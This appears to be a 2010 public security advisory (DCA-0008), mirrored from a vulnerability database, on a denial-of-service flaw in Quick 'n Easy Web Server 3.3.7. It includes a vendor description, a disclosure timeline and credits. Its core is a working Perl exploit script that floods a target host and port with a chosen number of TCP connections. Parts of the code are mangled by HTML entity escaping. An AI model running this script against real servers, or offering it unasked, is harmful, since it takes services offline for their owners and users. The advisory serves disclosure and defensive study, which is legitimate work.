[DCA-0008] Quick 'n Easy WEB Server DoS

2010-08-1400:00:00

vulners.com

JSON

[DCA-0008]

[Software]

Quick 'n Easy WEB Server

[Vendor Product Description]

Do you want run your own personal webserver or just want to test
your ASP/PHP scripts before you upload them to your webhosting server?
No problem, Quick ’n Easy Web Server can handle it!
Quick ‘n Easy Web Server for Windows 98/NT/XP/2003 and Vista(32 bits)
is very easy to configure, it supports native ASP (no need to install
IIS!) and it looks pretty cool too!

[Bug Description]

Quick 'n Easy Web Server can't handle multiple/simultaneous
connections leading to Denial-of-Service

[History]

Advisory sent to vendor on 06/14/2010.
No response from vendor
Public advisory & exploit 08/02/2010.

[Impact]

[Affected Version]

Quick 'n Easy WEB Server v3.3.7
Prior versions may also be vulnerable

[Code]

#!/usr/bin/perl
use IO::Socket;

    if &#40;@ARGV &lt; 1&#41; {
            usage&#40;&#41;;
    }

    $ip     = $ARGV[0];
    $port   = $ARGV[1];
    $conn   = $ARGV[2];

    $num    = 0;

    print &quot;[+] Sending request...&#92;n&quot;;

    while &#40; $num &lt;= $conn &#41; {
            system&#40;&quot;echo -n .&quot;&#41;;
            $s = IO::Socket::INET-&gt;new&#40;Proto =&gt; &quot;tcp&quot;, PeerAddr =&gt;

"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";

    close&#40;$s&#41;;
    $num++;
    }

    print &quot;&#92;n[+] Done!&#92;n&quot;;

sub usage() {
print "[-] Usage: <". $0 ."> <host> <port> <num-conn>\n";
print "[-] Example: ". $0 ." 127.0.0.1 80 1200\n";
exit;
}

[Credits]

Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br

[Greetz]
Crash and all Dclabs members.

–
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br

JSON

[DCA-0008] Quick &#39;n Easy WEB Server DoS

[DCA-0008] Quick 'n Easy WEB Server DoS